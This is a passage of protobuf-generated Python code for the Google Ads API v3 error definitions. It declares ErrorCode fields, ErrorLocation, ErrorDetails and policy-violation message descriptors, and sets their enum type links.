name='keyword_plan_error', full_name='google.ads.googleads.v3.errors.ErrorCode.keyword_plan_error', index=67,
number=71, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='keyword_plan_campaign_error', full_name='google.ads.googleads.v3.errors.ErrorCode.keyword_plan_campaign_error', index=68,
number=72, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='keyword_plan_negative_keyword_error', full_name='google.ads.googleads.v3.errors.ErrorCode.keyword_plan_negative_keyword_error', index=69,
number=73, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='keyword_plan_ad_group_error', full_name='google.ads.googleads.v3.errors.ErrorCode.keyword_plan_ad_group_error', index=70,
number=74, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='keyword_plan_keyword_error', full_name='google.ads.googleads.v3.errors.ErrorCode.keyword_plan_keyword_error', index=71,
number=75, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='keyword_plan_idea_error', full_name='google.ads.googleads.v3.errors.ErrorCode.keyword_plan_idea_error', index=72,
number=76, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='account_budget_proposal_error', full_name='google.ads.googleads.v3.errors.ErrorCode.account_budget_proposal_error', index=73,
number=77, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='user_list_error', full_name='google.ads.googleads.v3.errors.ErrorCode.user_list_error', index=74,
number=78, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='change_status_error', full_name='google.ads.googleads.v3.errors.ErrorCode.change_status_error', index=75,
number=79, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feed_error', full_name='google.ads.googleads.v3.errors.ErrorCode.feed_error', index=76,
number=80, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='geo_target_constant_suggestion_error', full_name='google.ads.googleads.v3.errors.ErrorCode.geo_target_constant_suggestion_error', index=77,
number=81, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='campaign_draft_error', full_name='google.ads.googleads.v3.errors.ErrorCode.campaign_draft_error', index=78,
number=82, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feed_item_error', full_name='google.ads.googleads.v3.errors.ErrorCode.feed_item_error', index=79,
number=83, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='label_error', full_name='google.ads.googleads.v3.errors.ErrorCode.label_error', index=80,
number=84, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='billing_setup_error', full_name='google.ads.googleads.v3.errors.ErrorCode.billing_setup_error', index=81,
number=87, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='customer_client_link_error', full_name='google.ads.googleads.v3.errors.ErrorCode.customer_client_link_error', index=82,
number=88, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='customer_manager_link_error', full_name='google.ads.googleads.v3.errors.ErrorCode.customer_manager_link_error', index=83,
number=91, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feed_mapping_error', full_name='google.ads.googleads.v3.errors.ErrorCode.feed_mapping_error', index=84,
number=92, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='customer_feed_error', full_name='google.ads.googleads.v3.errors.ErrorCode.customer_feed_error', index=85,
number=93, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ad_group_feed_error', full_name='google.ads.googleads.v3.errors.ErrorCode.ad_group_feed_error', index=86,
number=94, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='campaign_feed_error', full_name='google.ads.googleads.v3.errors.ErrorCode.campaign_feed_error', index=87,
number=96, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_interest_error', full_name='google.ads.googleads.v3.errors.ErrorCode.custom_interest_error', index=88,
number=97, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='campaign_experiment_error', full_name='google.ads.googleads.v3.errors.ErrorCode.campaign_experiment_error', index=89,
number=98, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='extension_feed_item_error', full_name='google.ads.googleads.v3.errors.ErrorCode.extension_feed_item_error', index=90,
number=100, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ad_parameter_error', full_name='google.ads.googleads.v3.errors.ErrorCode.ad_parameter_error', index=91,
number=101, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feed_item_validation_error', full_name='google.ads.googleads.v3.errors.ErrorCode.feed_item_validation_error', index=92,
number=102, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='extension_setting_error', full_name='google.ads.googleads.v3.errors.ErrorCode.extension_setting_error', index=93,
number=103, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feed_item_target_error', full_name='google.ads.googleads.v3.errors.ErrorCode.feed_item_target_error', index=94,
number=104, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='policy_violation_error', full_name='google.ads.googleads.v3.errors.ErrorCode.policy_violation_error', index=95,
number=105, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mutate_job_error', full_name='google.ads.googleads.v3.errors.ErrorCode.mutate_job_error', index=96,
number=108, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='partial_failure_error', full_name='google.ads.googleads.v3.errors.ErrorCode.partial_failure_error', index=97,
number=112, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='policy_validation_parameter_error', full_name='google.ads.googleads.v3.errors.ErrorCode.policy_validation_parameter_error', index=98,
number=114, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='size_limit_error', full_name='google.ads.googleads.v3.errors.ErrorCode.size_limit_error', index=99,
number=118, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='offline_user_data_job_error', full_name='google.ads.googleads.v3.errors.ErrorCode.offline_user_data_job_error', index=100,
number=119, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='not_whitelisted_error', full_name='google.ads.googleads.v3.errors.ErrorCode.not_whitelisted_error', index=101,
number=120, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='manager_link_error', full_name='google.ads.googleads.v3.errors.ErrorCode.manager_link_error', index=102,
number=121, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='currency_code_error', full_name='google.ads.googleads.v3.errors.ErrorCode.currency_code_error', index=103,
number=122, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='access_invitation_error', full_name='google.ads.googleads.v3.errors.ErrorCode.access_invitation_error', index=104,
number=124, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='reach_plan_error', full_name='google.ads.googleads.v3.errors.ErrorCode.reach_plan_error', index=105,
number=125, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='invoice_error', full_name='google.ads.googleads.v3.errors.ErrorCode.invoice_error', index=106,
number=126, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='payments_account_error', full_name='google.ads.googleads.v3.errors.ErrorCode.payments_account_error', index=107,
number=127, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='time_zone_error', full_name='google.ads.googleads.v3.errors.ErrorCode.time_zone_error', index=108,
number=128, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='asset_link_error', full_name='google.ads.googleads.v3.errors.ErrorCode.asset_link_error', index=109,
number=129, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='user_data_error', full_name='google.ads.googleads.v3.errors.ErrorCode.user_data_error', index=110,
number=130, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='error_code', full_name='google.ads.googleads.v3.errors.ErrorCode.error_code',
index=0, containing_type=None, fields=[]),
],
serialized_start=7724,
serialized_end=19319,
)
_ERRORLOCATION_FIELDPATHELEMENT = _descriptor.Descriptor(
name='FieldPathElement',
full_name='google.ads.googleads.v3.errors.ErrorLocation.FieldPathElement',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='field_name', full_name='google.ads.googleads.v3.errors.ErrorLocation.FieldPathElement.field_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='index', full_name='google.ads.googleads.v3.errors.ErrorLocation.FieldPathElement.index', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=19432,
serialized_end=19514,
)
_ERRORLOCATION = _descriptor.Descriptor(
name='ErrorLocation',
full_name='google.ads.googleads.v3.errors.ErrorLocation',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='field_path_elements', full_name='google.ads.googleads.v3.errors.ErrorLocation.field_path_elements', index=0,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_ERRORLOCATION_FIELDPATHELEMENT, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=19322,
serialized_end=19514,
)
_ERRORDETAILS = _descriptor.Descriptor(
name='ErrorDetails',
full_name='google.ads.googleads.v3.errors.ErrorDetails',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='unpublished_error_code', full_name='google.ads.googleads.v3.errors.ErrorDetails.unpublished_error_code', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='policy_violation_details', full_name='google.ads.googleads.v3.errors.ErrorDetails.policy_violation_details', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='policy_finding_details', full_name='google.ads.googleads.v3.errors.ErrorDetails.policy_finding_details', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=19517,
serialized_end=19739,
)
_POLICYVIOLATIONDETAILS = _descriptor.Descriptor(
name='PolicyViolationDetails',
full_name='google.ads.googleads.v3.errors.PolicyViolationDetails',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='external_policy_description', full_name='google.ads.googleads.v3.errors.PolicyViolationDetails.external_policy_description', index=0,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='key', full_name='google.ads.googleads.v3.errors.PolicyViolationDetails.key', index=1,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='external_policy_name', full_name='google.ads.googleads.v3.errors.PolicyViolationDetails.external_policy_name', index=2,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='is_exemptible', full_name='google.ads.googleads.v3.errors.PolicyViolationDetails.is_exemptible', index=3,
number=6, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=19742,
serialized_end=19921,
)
_POLICYFINDINGDETAILS = _descriptor.Descriptor(
name='PolicyFindingDetails',
full_name='google.ads.googleads.v3.errors.PolicyFindingDetails',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='policy_topic_entries', full_name='google.ads.googleads.v3.errors.PolicyFindingDetails.policy_topic_entries', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=19923,
serialized_end=20025,
)
_GOOGLEADSFAILURE.fields_by_name['errors'].message_type = _GOOGLEADSERROR
_GOOGLEADSERROR.fields_by_name['error_code'].message_type = _ERRORCODE
_GOOGLEADSERROR.fields_by_name['trigger'].message_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_common_dot_value__pb2._VALUE
_GOOGLEADSERROR.fields_by_name['location'].message_type = _ERRORLOCATION
_GOOGLEADSERROR.fields_by_name['details'].message_type = _ERRORDETAILS
_ERRORCODE.fields_by_name['request_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_request__error__pb2._REQUESTERRORENUM_REQUESTERROR
_ERRORCODE.fields_by_name['bidding_strategy_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_bidding__strategy__error__pb2._BIDDINGSTRATEGYERRORENUM_BIDDINGSTRATEGYERROR
_ERRORCODE.fields_by_name['url_field_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_url__field__error__pb2._URLFIELDERRORENUM_URLFIELDERROR
_ERRORCODE.fields_by_name['list_operation_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_list__operation__error__pb2._LISTOPERATIONERRORENUM_LISTOPERATIONERROR
_ERRORCODE.fields_by_name['query_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_query__error__pb2._QUERYERRORENUM_QUERYERROR
_ERRORCODE.fields_by_name['mutate_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_mutate__error__pb2._MUTATEERRORENUM_MUTATEERROR
_ERRORCODE.fields_by_name['field_mask_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_field__mask__error__pb2._FIELDMASKERRORENUM_FIELDMASKERROR
_ERRORCODE.fields_by_name['authorization_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_authorization__error__pb2._AUTHORIZATIONERRORENUM_AUTHORIZATIONERROR
_ERRORCODE.fields_by_name['internal_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_internal__error__pb2._INTERNALERRORENUM_INTERNALERROR
_ERRORCODE.fields_by_name['quota_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_quota__error__pb2._QUOTAERRORENUM_QUOTAERROR
_ERRORCODE.fields_by_name['ad_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__error__pb2._ADERRORENUM_ADERROR
_ERRORCODE.fields_by_name['ad_group_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__error__pb2._ADGROUPERRORENUM_ADGROUPERROR
_ERRORCODE.fields_by_name['campaign_budget_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__budget__error__pb2._CAMPAIGNBUDGETERRORENUM_CAMPAIGNBUDGETERROR
_ERRORCODE.fields_by_name['campaign_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__error__pb2._CAMPAIGNERRORENUM_CAMPAIGNERROR
_ERRORCODE.fields_by_name['authentication_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_authentication__error__pb2._AUTHENTICATIONERRORENUM_AUTHENTICATIONERROR
_ERRORCODE.fields_by_name['ad_group_criterion_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__criterion__error__pb2._ADGROUPCRITERIONERRORENUM_ADGROUPCRITERIONERROR
_ERRORCODE.fields_by_name['ad_customizer_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__customizer__error__pb2._ADCUSTOMIZERERRORENUM_ADCUSTOMIZERERROR
_ERRORCODE.fields_by_name['ad_group_ad_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__ad__error__pb2._ADGROUPADERRORENUM_ADGROUPADERROR
_ERRORCODE.fields_by_name['ad_sharing_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__sharing__error__pb2._ADSHARINGERRORENUM_ADSHARINGERROR
_ERRORCODE.fields_by_name['adx_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_adx__error__pb2._ADXERRORENUM_ADXERROR
_ERRORCODE.fields_by_name['asset_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_asset__error__pb2._ASSETERRORENUM_ASSETERROR
_ERRORCODE.fields_by_name['bidding_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_bidding__error__pb2._BIDDINGERRORENUM_BIDDINGERROR
_ERRORCODE.fields_by_name['campaign_criterion_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__criterion__error__pb2._CAMPAIGNCRITERIONERRORENUM_CAMPAIGNCRITERIONERROR
_ERRORCODE.fields_by_name['collection_size_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_collection__size__error__pb2._COLLECTIONSIZEERRORENUM_COLLECTIONSIZEERROR
_ERRORCODE.fields_by_name['country_code_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_country__code__error__pb2._COUNTRYCODEERRORENUM_COUNTRYCODEERROR
_ERRORCODE.fields_by_name['criterion_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_criterion__error__pb2._CRITERIONERRORENUM_CRITERIONERROR
_ERRORCODE.fields_by_name['customer_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__error__pb2._CUSTOMERERRORENUM_CUSTOMERERROR
_ERRORCODE.fields_by_name['date_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_date__error__pb2._DATEERRORENUM_DATEERROR
_ERRORCODE.fields_by_name['date_range_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_date__range__error__pb2._DATERANGEERRORENUM_DATERANGEERROR
_ERRORCODE.fields_by_name['distinct_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_distinct__error__pb2._DISTINCTERRORENUM_DISTINCTERROR
_ERRORCODE.fields_by_name['feed_attribute_reference_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__attribute__reference__error__pb2._FEEDATTRIBUTEREFERENCEERRORENUM_FEEDATTRIBUTEREFERENCEERROR
_ERRORCODE.fields_by_name['function_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_function__error__pb2._FUNCTIONERRORENUM_FUNCTIONERROR
_ERRORCODE.fields_by_name['function_parsing_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_function__parsing__error__pb2._FUNCTIONPARSINGERRORENUM_FUNCTIONPARSINGERROR
_ERRORCODE.fields_by_name['id_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_id__error__pb2._IDERRORENUM_IDERROR
_ERRORCODE.fields_by_name['image_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_image__error__pb2._IMAGEERRORENUM_IMAGEERROR
_ERRORCODE.fields_by_name['language_code_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_language__code__error__pb2._LANGUAGECODEERRORENUM_LANGUAGECODEERROR
_ERRORCODE.fields_by_name['media_bundle_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_media__bundle__error__pb2._MEDIABUNDLEERRORENUM_MEDIABUNDLEERROR
_ERRORCODE.fields_by_name['media_upload_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_media__upload__error__pb2._MEDIAUPLOADERRORENUM_MEDIAUPLOADERROR
_ERRORCODE.fields_by_name['media_file_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_media__file__error__pb2._MEDIAFILEERRORENUM_MEDIAFILEERROR
_ERRORCODE.fields_by_name['multiplier_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_multiplier__error__pb2._MULTIPLIERERRORENUM_MULTIPLIERERROR
_ERRORCODE.fields_by_name['new_resource_creation_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_new__resource__creation__error__pb2._NEWRESOURCECREATIONERRORENUM_NEWRESOURCECREATIONERROR
_ERRORCODE.fields_by_name['not_empty_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_not__empty__error__pb2._NOTEMPTYERRORENUM_NOTEMPTYERROR
_ERRORCODE.fields_by_name['null_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_null__error__pb2._NULLERRORENUM_NULLERROR
_ERRORCODE.fields_by_name['operator_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_operator__error__pb2._OPERATORERRORENUM_OPERATORERROR
_ERRORCODE.fields_by_name['range_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_range__error__pb2._RANGEERRORENUM_RANGEERROR
_ERRORCODE.fields_by_name['recommendation_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_recommendation__error__pb2._RECOMMENDATIONERRORENUM_RECOMMENDATIONERROR
_ERRORCODE.fields_by_name['region_code_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_region__code__error__pb2._REGIONCODEERRORENUM_REGIONCODEERROR
_ERRORCODE.fields_by_name['setting_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_setting__error__pb2._SETTINGERRORENUM_SETTINGERROR
